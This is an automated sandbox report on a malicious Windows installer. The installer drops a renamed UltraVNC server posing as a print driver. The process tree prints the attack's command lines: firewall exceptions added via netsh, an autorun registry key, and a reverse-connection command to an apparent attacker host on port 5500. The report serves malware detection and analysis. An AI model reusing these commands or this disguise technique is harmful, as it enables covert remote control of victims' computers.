Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rs8dpaIe6D.msi

Overview

General Information

Sample name:rs8dpaIe6D.msi
renamed because original name is a hash value
Original sample name:e21b2080c98beb0f04307a5a25630e23.msi
Analysis ID:1531399
MD5:e21b2080c98beb0f04307a5a25630e23
SHA1:8fc24ad51e8d61324fe8de1be667862e9238cbbb
SHA256:0dbeaab616c483b81d9e9ed8dda14a3a8f3b024130f8fab840e7b9f3a7b1787e
Tags:msiUltraVNCuser-abuse_ch
Infos:

Detection

UltraVNC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected UltraVNC Hacktool
AI detected suspicious sample
Contains VNC / remote desktop functionality (version string found)
Creates an undocumented autostart registry key
Drops executables to the windows directory (C:\Windows) and starts them
Modifies the windows firewall
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Checks for available system drives (often done to infect USB drives)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion NT Autorun Keys Modification
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes

Classification

Process Tree

  • System is w10x64
  • msiexec.exe (PID: 7544 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\rs8dpaIe6D.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 7608 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7708 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 09F4460A034BA1C42EB6AA8B09573B17 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • MSI4384.tmp (PID: 7792 cmdline: "C:\Windows\Installer\MSI4384.tmp" /DontWait /HideWindow /dir "C:\Games\" "C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd" MD5: 432827EC55428786A447B3D848D963B7)
  • PrintDrivers.exe (PID: 7824 cmdline: "C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd" MD5: 29ED7D64CE8003C0139CCCB04D9AF7F0)
    • cmd.exe (PID: 7864 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Games\PrintDrivers.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • mode.com (PID: 7916 cmdline: Mode 90,20 MD5: FB615848338231CEBC16E32A3035C3F8)
      • cmd.exe (PID: 7936 cmdline: C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 7952 cmdline: C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • reg.exe (PID: 7968 cmdline: Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • WMIC.exe (PID: 7988 cmdline: wmic process where (name="PrintDriver.exe") get commandline MD5: E2DE6500DE1148C7F6027AD50AC8B891)
      • findstr.exe (PID: 7996 cmdline: findstr /i "PrintDriver.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7700 cmdline: C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\PrintDriver.txt" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 7760 cmdline: cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • mode.com (PID: 7704 cmdline: Mode 90,20 MD5: FB615848338231CEBC16E32A3035C3F8)
        • netsh.exe (PID: 7560 cmdline: netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplication" mode=ENABLE scope=ALL MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • netsh.exe (PID: 7708 cmdline: netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • WMIC.exe (PID: 7580 cmdline: wmic process where (name="PrintDriver.exe") get commandline MD5: E2DE6500DE1148C7F6027AD50AC8B891)
        • findstr.exe (PID: 7804 cmdline: findstr /i "PrintDriver.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • PrintDriver.exe (PID: 7304 cmdline: C:\Games\PrintDriver.exe -autoreconnect ID:5271523 -connect besthard2024.zapto.org:5500 -run MD5: 27C1C264C6FCE4A5F44419F1783DB8E0)
      • timeout.exe (PID: 2828 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • taskkill.exe (PID: 4856 cmdline: taskkill /im rundll32.exe /f MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • timeout.exe (PID: 8000 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • taskkill.exe (PID: 8012 cmdline: taskkill /im rundll32.exe /f MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • timeout.exe (PID: 8144 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • taskkill.exe (PID: 2080 cmdline: taskkill /im rundll32.exe /f MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • PrintDrivers.exe (PID: 7732 cmdline: C:\Games\PrintDrivers.exe /HideWindow C:\Games\driverhelp.cmd MD5: 29ED7D64CE8003C0139CCCB04D9AF7F0)
        • cmd.exe (PID: 7600 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Games\driverhelp.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • mode.com (PID: 5344 cmdline: Mode 90,20 MD5: FB615848338231CEBC16E32A3035C3F8)
          • cmd.exe (PID: 7932 cmdline: C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • cmd.exe (PID: 8180 cmdline: C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • reg.exe (PID: 7324 cmdline: Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
          • timeout.exe (PID: 1148 cmdline: timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • timeout.exe (PID: 8012 cmdline: timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • timeout.exe (PID: 7768 cmdline: timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • timeout.exe (PID: 3584 cmdline: timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • timeout.exe (PID: 7184 cmdline: timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • timeout.exe (PID: 1028 cmdline: timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Games\PrintDriver.exeJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000001A.00000000.1861273877.00007FF67DD0C000.00000002.00000001.01000000.0000000F.sdmpJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
      0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmpJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
        0000001A.00000000.1861087410.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmpJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
          0000001A.00000002.2961946553.00007FF67DD0C000.00000002.00000001.01000000.0000000F.sdmpJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
            Process Memory Space: PrintDriver.exe PID: 7304JoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              26.2.PrintDriver.exe.7ff67da80000.0.unpackJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                26.0.PrintDriver.exe.7ff67da80000.0.unpackJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security

                  Sigma Signatures

                  Sigma detected: CurrentVersion NT Autorun Keys Modification
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Games\PrintDriver.cmd, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 7608, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\Load

                  Suricata Signatures

                  No Suricata rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Multi AV Scanner detection for domain / URL
                  Source: besthard2024.zapto.orgVirustotal: Detection: 8%Perma Link
                  Multi AV Scanner detection for dropped file
                  Source: C:\Games\PrintDriver.exeVirustotal: Detection: 8%Perma Link
                  Multi AV Scanner detection for submitted file
                  Source: rs8dpaIe6D.msiVirustotal: Detection: 14%Perma Link
                  Source: rs8dpaIe6D.msiReversingLabs: Detection: 26%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
                  Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\winvnc\x64\Release\winvnc.pdbGCTL source: PrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.dr
                  Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\x64\Release\vnchooks.pdb source: vnchooks.dll.1.dr
                  Source: Binary string: C:\Users\rudi\Desktop\Windows-driver-samples-master\video\UVncVirtualDisplay\x64\Release\UVncVirtualDisplay.pdb source: UVncVirtualDisplay.dll.1.dr
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdbD source: MSI4384.tmp, 00000003.00000000.1741334832.000000000046F000.00000002.00000001.01000000.00000003.sdmp, MSI4384.tmp, 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp, rs8dpaIe6D.msi, 603b50.msi.1.dr, MSI4384.tmp.1.dr, MSI4112.tmp.1.dr, 603b52.rbs.1.dr
                  Source: Binary string: C:\Users\rudi\Desktop\ddengine\x64\Release\ddengine.pdb source: ddengine.dll.1.dr
                  Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\winvnc\x64\Release\winvnc.pdb source: PrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.dr
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: powercfg.msi.1.dr
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: PrintDrivers.exe, 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp, PrintDrivers.exe, 00000004.00000000.1742802683.00000000005C9000.00000002.00000001.01000000.00000005.sdmp, PrintDrivers.exe, 00000021.00000000.1887440811.00000000005C9000.00000002.00000001.01000000.00000005.sdmp, PrintDrivers.exe, 00000021.00000002.2957683401.00000000005C9000.00000002.00000001.01000000.00000005.sdmp, PrintDrivers.exe.1.dr, powercfg.msi.1.dr
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbd source: powercfg.msi.1.dr
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: rs8dpaIe6D.msi, MSI4075.tmp.1.dr, MSI3ECB.tmp.1.dr, 603b50.msi.1.dr, MSI3F98.tmp.1.dr, MSI3F39.tmp.1.dr, MSI3FE7.tmp.1.dr
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdb source: MSI4384.tmp, 00000003.00000000.1741334832.000000000046F000.00000002.00000001.01000000.00000003.sdmp, MSI4384.tmp, 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp, rs8dpaIe6D.msi, 603b50.msi.1.dr, MSI4384.tmp.1.dr, MSI4112.tmp.1.dr, 603b52.rbs.1.dr
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb0 source: PrintDrivers.exe, 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp, PrintDrivers.exe, 00000004.00000000.1742802683.00000000005C9000.00000002.00000001.01000000.00000005.sdmp, PrintDrivers.exe, 00000021.00000000.1887440811.00000000005C9000.00000002.00000001.01000000.00000005.sdmp, PrintDrivers.exe, 00000021.00000002.2957683401.00000000005C9000.00000002.00000001.01000000.00000005.sdmp, PrintDrivers.exe.1.dr, powercfg.msi.1.dr
                  Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:
                  Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_00461914 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00461914
                  Source: global trafficTCP traffic: 192.168.2.4:49743 -> 94.156.104.60:5500
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficDNS traffic detected: DNS query: besthard2024.zapto.org
                  Source: rs8dpaIe6D.msi, 603b50.msi.1.dr, MSI4384.tmp.1.dr, MSI4112.tmp.1.dr, 603b52.rbs.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: UVncVirtualDisplay.dll.1.dr, uvncvirtualdisplay.cat.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                  Source: UVncVirtualDisplay.dll.1.dr, uvncvirtualdisplay.cat.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
                  Source: rs8dpaIe6D.msi, 603b50.msi.1.dr, MSI4384.tmp.1.dr, MSI4112.tmp.1.dr, 603b52.rbs.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: rs8dpaIe6D.msi, 603b50.msi.1.dr, MSI4384.tmp.1.dr, MSI4112.tmp.1.dr, 603b52.rbs.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: ddengine.dll.1.dr, vnchooks.dll.1.dr, PrintDriver.exe.1.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                  Source: ddengine.dll.1.dr, vnchooks.dll.1.dr, PrintDriver.exe.1.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                  Source: ddengine.dll.1.dr, vnchooks.dll.1.dr, PrintDriver.exe.1.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                  Source: ddengine.dll.1.dr, vnchooks.dll.1.dr, PrintDriver.exe.1.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                  Source: UVncVirtualDisplay.dll.1.dr, uvncvirtualdisplay.cat.1.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                  Source: rs8dpaIe6D.msi, 603b50.msi.1.dr, MSI4384.tmp.1.dr, MSI4112.tmp.1.dr, 603b52.rbs.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: UVncVirtualDisplay.dll.1.dr, uvncvirtualdisplay.cat.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
                  Source: rs8dpaIe6D.msi, 603b50.msi.1.dr, MSI4384.tmp.1.dr, MSI4112.tmp.1.dr, 603b52.rbs.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: rs8dpaIe6D.msi, 603b50.msi.1.dr, MSI4384.tmp.1.dr, MSI4112.tmp.1.dr, 603b52.rbs.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: UVncVirtualDisplay.dll.1.dr, uvncvirtualdisplay.cat.1.drString found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
                  Source: UVncVirtualDisplay.dll.1.dr, uvncvirtualdisplay.cat.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                  Source: UVncVirtualDisplay.dll.1.dr, uvncvirtualdisplay.cat.1.drString found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
                  Source: ddengine.dll.1.dr, vnchooks.dll.1.dr, PrintDriver.exe.1.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                  Source: ddengine.dll.1.dr, vnchooks.dll.1.dr, PrintDriver.exe.1.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                  Source: ddengine.dll.1.dr, vnchooks.dll.1.dr, PrintDriver.exe.1.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                  Source: 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: PrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC0C000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.drString found in binary or memory: http://java.sun.com/products/plugin/index.html#download
                  Source: PrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC0C000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.drString found in binary or memory: http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1
                  Source: ddengine.dll.1.dr, vnchooks.dll.1.dr, PrintDriver.exe.1.drString found in binary or memory: http://ocsp.comodoca.com0
                  Source: rs8dpaIe6D.msi, 603b50.msi.1.dr, MSI4384.tmp.1.dr, MSI4112.tmp.1.dr, 603b52.rbs.1.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: rs8dpaIe6D.msi, 603b50.msi.1.dr, MSI4384.tmp.1.dr, MSI4112.tmp.1.dr, 603b52.rbs.1.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: UVncVirtualDisplay.dll.1.dr, uvncvirtualdisplay.cat.1.drString found in binary or memory: http://ocsp.digicert.com0I
                  Source: UVncVirtualDisplay.dll.1.dr, uvncvirtualdisplay.cat.1.drString found in binary or memory: http://ocsp.digicert.com0R
                  Source: rs8dpaIe6D.msi, 603b50.msi.1.dr, MSI4384.tmp.1.dr, MSI4112.tmp.1.dr, 603b52.rbs.1.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: ddengine.dll.1.dr, vnchooks.dll.1.dr, PrintDriver.exe.1.drString found in binary or memory: http://ocsp.sectigo.com0
                  Source: UVncVirtualDisplay.dll.1.dr, uvncvirtualdisplay.cat.1.drString found in binary or memory: http://ocsp.thawte.com0
                  Source: PrintDrivers.exe.1.dr, powercfg.msi.1.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
                  Source: PrintDrivers.exe.1.dr, powercfg.msi.1.drString found in binary or memory: http://s.symcd.com06
                  Source: PrintDrivers.exe.1.dr, powercfg.msi.1.drString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
                  Source: PrintDrivers.exe.1.dr, powercfg.msi.1.drString found in binary or memory: http://t2.symcb.com0
                  Source: PrintDrivers.exe.1.dr, powercfg.msi.1.drString found in binary or memory: http://tl.symcb.com/tl.crl0
                  Source: PrintDrivers.exe.1.dr, powercfg.msi.1.drString found in binary or memory: http://tl.symcb.com/tl.crt0
                  Source: PrintDrivers.exe.1.dr, powercfg.msi.1.drString found in binary or memory: http://tl.symcd.com0&
                  Source: PrintDrivers.exe.1.dr, powercfg.msi.1.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                  Source: UVncVirtualDisplay.dll.1.dr, uvncvirtualdisplay.cat.1.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                  Source: PrintDrivers.exe.1.dr, powercfg.msi.1.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                  Source: UVncVirtualDisplay.dll.1.dr, uvncvirtualdisplay.cat.1.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                  Source: UVncVirtualDisplay.dll.1.dr, uvncvirtualdisplay.cat.1.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                  Source: PrintDrivers.exe.1.dr, powercfg.msi.1.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                  Source: PrintDrivers.exe.1.dr, powercfg.msi.1.drString found in binary or memory: https://d.symcb.com/cps0%
                  Source: PrintDrivers.exe.1.dr, powercfg.msi.1.drString found in binary or memory: https://d.symcb.com/rpa0
                  Source: PrintDrivers.exe.1.dr, powercfg.msi.1.drString found in binary or memory: https://d.symcb.com/rpa0.
                  Source: PrintDriver.exe.1.drString found in binary or memory: https://forum.uvnc.com
                  Source: PrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.drString found in binary or memory: https://forum.uvnc.comvncMenu::WndProc
                  Source: ddengine.dll.1.dr, vnchooks.dll.1.dr, PrintDriver.exe.1.drString found in binary or memory: https://sectigo.com/CPS0
                  Source: PrintDrivers.exe.1.dr, powercfg.msi.1.drString found in binary or memory: https://www.advancedinstaller.com
                  Source: UVncVirtualDisplay.dll.1.dr, uvncvirtualdisplay.cat.1.drString found in binary or memory: https://www.digicert.com/CPS0
                  Source: PrintDrivers.exe.1.dr, powercfg.msi.1.drString found in binary or memory: https://www.thawte.com/cps0/
                  Source: PrintDrivers.exe.1.dr, powercfg.msi.1.drString found in binary or memory: https://www.thawte.com/repository0W
                  Source: PrintDriver.exe.1.drString found in binary or memory: https://www.uvnc.com
                  Source: PrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.drString found in binary or memory: https://www.uvnc.comcmd
                  Source: PrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.drString found in binary or memory: https://www.uvnc.comhttps://forum.uvnc.comnet
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\603b50.msiJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3ECB.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3F39.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3F98.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3FE7.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4075.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{47512254-C195-428F-AD42-A0F24652B3FD}Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4112.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4384.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI3ECB.tmpJump to behavior
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_004601503_2_00460150
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_004571A93_2_004571A9
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_004583933_2_00458393
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_0042D4003_2_0042D400
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_0044B5703_2_0044B570
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_0045168D3_2_0045168D
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_004537DC3_2_004537DC
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_0045F7A43_2_0045F7A4
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_00465A593_2_00465A59
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_00451ACC3_2_00451ACC
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_00453B753_2_00453B75
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_00455B103_2_00455B10
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_00449CEC3_2_00449CEC
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_0045FDF03_2_0045FDF0
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_005867A04_2_005867A0
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_005B00404_2_005B0040
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_005AE0E04_2_005AE0E0
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_005B91514_2_005B9151
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_005AB1CB4_2_005AB1CB
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_0058C3404_2_0058C340
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_005AB3FD4_2_005AB3FD
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_005A67B04_2_005A67B0
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_005C18044_2_005C1804
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_005B18B44_2_005B18B4
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_005C19244_2_005C1924
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_0058DD004_2_0058DD00
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_005BFDE44_2_005BFDE4
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_005C4EF04_2_005C4EF0
